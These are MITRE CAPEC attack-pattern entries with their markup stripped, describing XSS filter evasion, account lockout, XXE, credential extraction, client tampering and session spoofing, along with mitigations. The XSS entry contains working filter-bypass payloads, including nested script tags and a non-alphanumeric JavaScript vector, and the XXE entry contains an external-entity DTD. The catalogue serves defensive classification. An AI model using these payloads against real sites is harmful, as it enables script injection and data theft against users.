Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Target client software must allow scripting such as JavaScript.
High
High
Injection
Protocol Manipulation
In this example, the attacker tries to get <script>alert(1)</script> executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An attacker will then create a special payload to bypass this filter:
<scriscriptpt>alert(1)</scscriptript>
when the applications gets this input string, it will replace all "script" (case insensitive) by the empty string and the resulting input will be the desired vector by the attacker:
<script>alert(1)</script>
In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., <script>HERE</script>). For the attacker to execute the same payload as in the previous example, he would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter
((\w+)\s*\(.*\)|alert|eval|function|document)
and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string "alert" would be stripped. An attacker will then create a special payload to bypass this filter:
this['al' + 'ert'](1)
when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The attacker could also have used non-alphanumeric XSS vectors to bypass the filter; for example,
($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
would be executed by the JavaScript engine like alert(1) is.
Low
To inject the malicious payload in a web page
High
To bypass non trivial filters in the application
Ability to send HTTP request to a web application.
Design: Use browser technologies that do not allow client side scripting.
Design: Utilize strict type, character, and encoding enforcement
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.
Implementation: Perform input validation for all remote content, including remote and user-generated content
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
Any HTTP Request transport variables (GET, POST, Headers, etc.)
XSS malicious script formed in non-traditional syntax
Client web browser where script is executed
Client web browser may be used to steal session data, passwords, cookies, and other tokens.
79
Targeted
87
Targeted
85
Targeted
20
Targeted
86
Targeted
692
Targeted
697
Targeted
713
Targeted
71
Targeted
1000
Attack Pattern
ChildOf
18
http://capec.mitre.org/data/definitions/18.html
1000
Attack Pattern
ChildOf
220
http://capec.mitre.org/data/definitions/220.html
Exploitation
High
High
Low
Client-Server
n-Tier
All
All
All
OWASP Cheatsheets
XSS Filter Evasion Cheat Sheet
The Open Web Application Security Project (OWASP)
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
OWASP Testing Guide
Testing for Cross site scripting
v2
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_Cross_site_scripting
Non-alphanumeric XSS cheat sheet
http://sla.ckers.org/forum/read.php?24,28687
WASC Threat Classification 2.0
WASC-08 - Cross Site Scripting
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Cross-Site+Scripting
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.
Investigate account lockout behavior of system
Investigate the security features present in the system that may trigger an account lockout
Analyze system documentation to find list of events that could potentially cause account lockout
env-Web env-ClientServer env-Local env-Embedded
Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
env-Web env-ClientServer env-Local env-Embedded
Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out.
env-Web env-ClientServer env-Local env-Embedded
System provides error message stating that account being attacked is locked out.
env-Web env-ClientServer env-Local env-Embedded
After a certain number of login attempts with a given user ID, the amount of time it takes for system to respond to further login attempts changes noticeably.
env-Web env-ClientServer env-Local env-Embedded
System has no automatic signup mechanism, and system provides no indication as to whether the attacker is entering incorrect credentials or the account is locked out during the login process.
env-Web env-ClientServer env-Local env-Embedded
Attacker determines at least one way to lock out accounts.
System provides no indication that account lockouts are possible
Repeated failed login attempts in application/system logs.
Do not provide any indication to users that their accounts are locked out. Provide a simple error message such as: "Login failed. Try again or contact your administrator" regardless of why a login attempt fails.
Obtain list of user accounts to lock out
Generate a list of valid user accounts to lock out
Obtain list of authorized users using another attack pattern, such as SQL Injection.
env-Web env-ClientServer env-Local env-Embedded
Attempt to create accounts if possible; system should indicate if a user ID is already taken.
env-Web env-ClientServer env-Local env-Embedded
Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.
env-Web env-ClientServer env-Local env-Embedded
System indicates which user IDs are valid and which are not to unauthenticated users.
env-Web env-ClientServer env-Local env-Embedded
Attacker gathers list of user IDs
Attacker is unable to gather list of valid user IDs; attacker may still be able to lock out accounts by blindly guessing user IDs and performing a lockout procedure with each one.
Avoid providing any indication regarding the validity of user IDs upon failed login attempts. Provide a simple error message such as: "Login failed. Try again or contact your administrator" regardless of why a login attempt fails.
Lock Out Accounts
Perform lockout procedure for all accounts that the attacker wants to lock out.
For each user ID to be locked out, perform the lockout procedure discovered in the first step.
env-Web env-ClientServer env-Local env-Embedded
Success outcome in first step
env-Web env-ClientServer env-Local env-Embedded
Failure outcome in first step
env-Web env-ClientServer env-Local env-Embedded
Amount of work required by an attacker to lock out a large number of accounts is at least an order of magnitude smaller than the amount of work required to unlock the accounts thereafter.
The large amount of work required by an attacker to lock out a large number of accounts makes this an unattractive attack.
The system has a lockout mechanism.
An attacker must be able to reproduce behavior that would result in an account being locked.
Medium
High
API Abuse
Flooding
Brute Force
A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction.
Low
Computer with access to the login portion of the target system
Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.
When implementing security features, consider how they can be misused and made to turn on themselves.
Availability
DoS: resource consumption (other)
Denial of Service
400
Secondary
1000
Attack Pattern
ChildOf
212
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.
Determine the ciphertext and the encryption algorithm.
Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense.
Ciphertext is known.
Encryption algorithm and key size are known.
Low
Low
Brute Force
In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days.
Low
Brute forcing encryption does not require much skill.
A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).
On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.
Obviously as N gets large the brute force approach becomes infeasible.
None. This attack happens offline.
Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.
In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.
Confidentiality
Read application data
326
Targeted
327
Targeted
693
Targeted
719
Secondary
1000
Attack Pattern
ChildOf
112
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content. For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information. For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information.
If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records.
This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.
The target application must utilize some sort of filtering mechanism (input, output, or data masking).
Medium
No special resources are required.
1000
Attack Pattern
ChildOf
56
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker creates an XML document that with an external entity reference. External entity references can take the form of <!ENTITY name system "uri"> tags in a DTD. Because processors may not validate documents with external entities, there may be no checks on the nature of the reference in the external entity. This can allow an attacker to open arbitrary files or connections. For example, the following DTD would attempt to open the /dev/tty device:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///dev/tty"> ]>
The target must follow external entity references without validating the validity of the reference target.
Medium
The attacker must be able to trick the target into loading an XML document with crafted external entity reference.
Configure the XML processor to only retrieve external entities from trusted sources.
CVE-2008-0628
The XML parsing code in Sun Java Runtime Environment JDK and JRE 6 Update 3 and earlier processes external entity references even when the "external general entities" property is false, which allows remote attackers to conduct XML external entity (XXE) attacks and cause a denial of service or access restricted resources.
1000
Attack Pattern
ChildOf
231
1000
Attack Pattern
ChildOf
221
XXE (Xml eXternal Entity) Attack
Beyond Security
http://www.securiteam.com/securitynews/6D0100A5PU.html
CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection
http://scary.beasts.org/security/CESA-2007-002.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures. For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality. For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance.
Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.
The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary.
Medium
The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality.
602
Targeted
1000
Attack Pattern
ChildOf
22
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates the registry values used by an application to perform a variety of possible attacks. Many applications utilize registries to store configuration and service information. As such, attacks that manipulate these registries can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of the targeted application. It is important to note that "registry" does not only refer to the Microsoft Windows Registry, but to any registry used by an application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a registry value beyond an application's ability to store it), but given the long term usage of many registry values, the registry manipulation could be its own end.
The targeted application must rely on values stored in a registry.
Medium
No special resources are required.
1000
Attack Pattern
ChildOf
176
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker examines a target application's cache for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.
The target application must store sensitive information in a cache.
The cache must be inadequately protected against attacker access.
Medium
The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file.
311
Targeted
1000
Attack Pattern
ChildOf
37
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker examines a target application's code or configuration files to find credential or key material that has been embedded within the application or its files. Many services require authentication with their users for the various purposes including billing, access control or attribution. Some client applications store the user's authentication credentials or keys to accelerate the login process. Some clients may have built-in keys or credentials (in which case the server is authenticating with the client, rather than the user). If the attacker is able to locate where this information is stored, they may be able to retrieve these credentials. The attacker could then use these stolen credentials to impersonate the user or client, respectively, in interactions with the service or use stolen keys to eavesdrop on nominally secure communications between the client and server.
Identify Target
Attacker identifies client components to extract information from. These may be configuration files, local databases, binary executables, class files, shared libraries (e.g., DLLs), or other machine code.
Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Package listing. The attacker uses a package manifest provided with the software installer, or the file system itself, to identify component files suitable for attack.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Proprietary or sensitive data is stored in a location ultimately distributed to end users.
env-Local env-Embedded env-ClientServer env-Peer2Peer
No sensitive data seems to be stored in the user's client. The storage could be done after the first authentication or execution of the thick client.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Access to binary code is not realistic. For example, in a client-server environment, binary code on the server is presumed to be inscrutable to an attacker unless another vulnerability exposes it.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
The attacker identifies one or more files or data in the software that might store credentials information.
Obfuscation, anti-debugging, packing can make the observation and reverse engineering more difficult. It is only capable of delaying an attacker, however, not preventing a sufficiently motivated and resourced one.
Apply mining techniques
The attacker then uses a variety of techniques, such as monitoring, sniffing, reverse-engineering, cryptanalysis to extract the sensitive information and its associated use by the application.
API Profiling. The attacker monitors the software's use of registry keys or other storage locations that can contain sensitive information.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Execution in debugger. The attacker attaches a debugger to the application to monitor authentication process and retrieve important application steps (reverse algorithms) along system calls, network communication, etc.
env-Local env-Embedded
Cryptanalysis. The attacker performs cryptanalysis to identify data in the client component which may be cryptographically significant. (Key material frequently stands out as very high entropy data when compared to other mundane data). Given cryptographically significant data, other analyses are performed (e.g., length, internal structure, etc.) to determine potential algorithms (RSA, ECC, AES, etc.). This process proceeds until the attacker reaches a conclusion about the significance and use of the data.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Sensitive credentials data are used and embedded inside the client-accessible artifacts.
env-Local env-Embedded env-ClientServer env-Peer2Peer
The attacker extracts credentials related information.
The target application must save keys or credential information. Many applications allow users to store authentication information as an option.
Medium
High
Analysis
The Java client program for the ATEN KH1516i IP KVM switch with firmware 1.0.063 and the KN9116 IP KVM switch with firmware 1.1.104 has a hardcoded AES encryption key, which makes it easier for man-in-the-middle attackers to (1) execute arbitrary Java code, or (2) gain access to machines connected to the switch, by hijacking a session. CVE Reference CVE-2009-1472
Low
To extract sensitive data from configuration files, system registry, local databases, etc.
High
To reverse engineer an application flow to retrieve credentials
The attacker must be able to reach the target application's code or configuration files. This may require prior access to the machine on which the target application runs. Authentication information is often encoded or encrypted, but this might not require significant attacker resources to compromise.
Design: When possible, don't store credentials information on the client side
Implementation: Don't store clear text or obfuscated credential information (or cryptographic keys) on the client side; use strong encryption to store any credentials related information
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
259
Targeted
522
Targeted
CVE-2010-0557
IBM Cognos Express 9.0 allows attackers to obtain unspecified access to the Tomcat Manager component, and cause a denial of service, by leveraging hardcoded credentials.
CVE-2009-1472
The Java client program for the ATEN KH1516i IP KVM switch with firmware 1.0.063 and the KN9116 IP KVM switch with firmware 1.1.104 has a hardcoded AES encryption key, which makes it easier for man-in-the-middle attackers to (1) execute arbitrary Java code, or (2) gain access to machines connected to the switch, by hijacking a session.
1000
Attack Pattern
ChildOf
37
http://capec.mitre.org/data/definitions/37.html
Reconnaissance
Exploitation
High
High
Low
Client-Server
SOA
n-Tier
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker extracts credentials used for code signing from a production environment and uses these credentials to sign malicious content with the developer's key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the attacker has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the attacker to execute arbitrary code on the victim's computer.
The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the attacker does not need to steal the signing key before forging code bundles in the developer's name.)
Very High
No special resources are required for this attack.
1000
Attack Pattern
ChildOf
68
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker removes or disables functionality on the client that the server assumes to be present and trustworthy. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an attacker can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.
Probing
The attacker probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.
The attacker probes by exploring an application's functionality and its underlying mapping to server-side components.
env-Web env-ClientServer
The attacker reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation.
env-Web env-ClientServer
The server relies on some functionality on the client for correct and secure operation.
env-Web env-ClientServer
The server does not rely on any functionality on the client.
env-Web env-ClientServer
A list of functionality on the client that the server assumes to be present and trustworthy.
Use obfuscation and other techniques to prevent reverse engineering the client-side code.
Determine which functionality to disable or remove
The attacker tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.
The attacker reverse engineers the client-side code to determine which functionality to disable or remove.
env-Web env-ClientServer
The attacker understands and can disable or remove the critical functionality from the client code.
Use obfuscation and other techniques to prevent reverse engineering the client-side code.
Disable or remove the critical functionality from the client code
Once the functionality has been determined, the attacker disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.
The attacker disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server.
env-Web env-ClientServer
The attacker can perform malicious actions that the server believes are prohibited.
Use obfuscation and other techniques to prevent reverse engineering the client-side code.
For any security checks that are performed on the client-side, ensure that these checks are duplicated on the server side.
The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client.
High
Medium
Analysis
Modification of Resources
Attacker reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.
High
To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.
The attacker must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary.
Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.
Design: Ship client-side application with integrity checks (code signing) when possible.
Design: Use obfuscation and other techniques to prevent reverse engineering the client code.
Confidentiality
"Varies by context"
Information Leakage
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read memory
Integrity
Modify memory
Confidentiality
Read application data
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
The client code
Malicious code or modified value in the client code
Client Side and Server Side
Bypass the authorization check
602
Targeted
CVE-2009-0247
The server for 53KF Web IM 2009 Home, Professional, and Enterprise editions relies on client-side protection mechanisms against cross-site scripting (XSS), which allows remote attackers to conduct XSS attacks by using a modified client to send a crafted IM message, related to the msg variable.
1000
Attack Pattern
ChildOf
22
http://capec.mitre.org/data/definitions/22.html
Exploitation
Penetration
High
High
Low
Client-Server
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.
The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations.
Medium
The attacker must have access to the client for the targeted service. (This step is trivial for most web-based services.) The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this.
602
Targeted
1000
Attack Pattern
ChildOf
56
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. Some browsers will detect that the specified MIME type of the file does not match the actual type of the content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the attackers' script may run on the target unsanitized. For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file's real type and invokes the appropriate interpreter, scripted content could be invoked. In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters. In a cross-site scripting attack, the attacker tricks the victim into accessing a URL that uploads a script file with an incorrectly specified MIME type. If the victim's browser switches to the appropriate interpreter without filtering, the attack will execute as a standard XSS attack, possibly revealing the victim's cookies or executing arbitrary script in their browser.
The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.
The victim's browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content.
Medium
The attacker must have the ability to source the file of the incorrect MIME type containing a script.
79
Targeted
345
Targeted
646
Targeted
CVE-2001-0999
Outlook Express 6.00 allows remote attackers to execute arbitrary script by embedding SCRIPT tags in a message whose MIME content type is text/plain, contrary to the expected behavior that text/plain messages will not run script.
1000
Attack Pattern
ChildOf
18
OWASP Testing Guide
Testing for Stored Cross site scripting (OWASP-DV-002)
v4 [DRAFT]
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so.
Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes "trust" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points.
Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers.
The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system.
Survey the application for Indicators of Susceptibility
Using a variety of methods, until one is found that applies to the target system. the attacker probes for credentials, session tokens, or entry points that bypass credentials altogether.
Spider all available pages
env-Web
Attack known bad interfaces
env-Web env-CommProtocol env-ClientServer env-Local
Session IDs are used
env-Web env-Peer2Peer env-ClientServer env-CommProtocol
Open access points exist that use no user IDs or passwords, but determine authorization based on message content
env-Web env-Peer2Peer env-CommProtocol env-ClientServer env-Local
Session IDs are identifiable
Open channels are available
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Fetch samples
An attacker fetches many samples of a session ID. This may be through legitimate access (logging in, legitimate connections, etc) or just systematic probing.
An attacker makes many anonymous connections and records the session IDs assigned.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
An attacker makes authorized connections and records the session tokens or credentials issued.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
An attacker gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connections from it, attempting to gain the same privileges as a trusted system.
env-Peer2Peer env-CommProtocol env-ClientServer
Trust in the system is based on IP address, MAC address, network locality, or other general network characteristic.
env-CommProtocol env-ClientServer env-Peer2Peer
Web applications use session IDs
env-Web
Network systems issue session IDs or connection IDs
env-CommProtocol env-ClientServer env-Peer2Peer
Systems or applications grant trust based on logical or physical network locality.
Session identifiers successfully spoofed
No session IDs can be found or exploited
Monitor logs for unusual amounts of invalid sessions.
Monitor logs for unusual amounts of invalid connections or invalid requests from unauthorized hosts.
Impersonate
An attacker can use successful experiments to impersonate an authorized user or system
Analyze logs for users or systems that are connecting from unexpected sources.
Analyze logs for users or systems successfully requesting or performing unexpected actions.
If heuristics are sufficiently reliable, disconnect hosts or users that appear to be unauthorized impersonations.
Spoofing
Bad data can be injected into the system by an attacker.
Unauthorized data is injected into an application.
Apply heuristic evaluation to input data. This can include validating source addresses, user names, ACLs or other data that indicates authorization. This need not be done inline at the time the data is processed, but can be done after the processing has occurred to detect attack.
Apply transaction-based logic to systems whose initial authorization cannot be better controlled. Roll back transactions that are subsequently determined to be fraudulent or illegitimate.
Server software must rely on weak session IDs proof and/or verification schemes
High
High
Spoofing
API Abuse
Injection
Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs.
A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side.
The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application.
Low
To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user
Ability to deploy software on network. Ability to communicate synchronously or asynchronously with server
Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.
Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.
Implementation: If the session identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.
Implementation: If the web or application server supports it, then encrypting and/or signing the session ID (such as cookie) can protect the ID if intercepted.
Design: Use strong session identifiers that are protected in transit and at rest.
Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.
Implementation: Verify of authenticity of all session IDs at runtime.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
Integrity
Modify application data
Malicious input delivered through standard service calls, e.g. FTP or posting a message to a message queue.
Varies with instantiation of attack pattern. The main goal is so spoof or impersonate a legitimate user.
Client machine and client network (e.g. Intranet)
Enables attacker to impersonate another user and access commands and data (and log behavior to audit logs) on their behalf.
290
Targeted
302
Targeted
346
Targeted
539
Secondary
6
Targeted
384
Secondary
664
Targeted
602
Targeted
642
Targeted
1000
Category
ChildOf
225
Penetration
High
High
Low
Client-Server
n-Tier
SOA
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
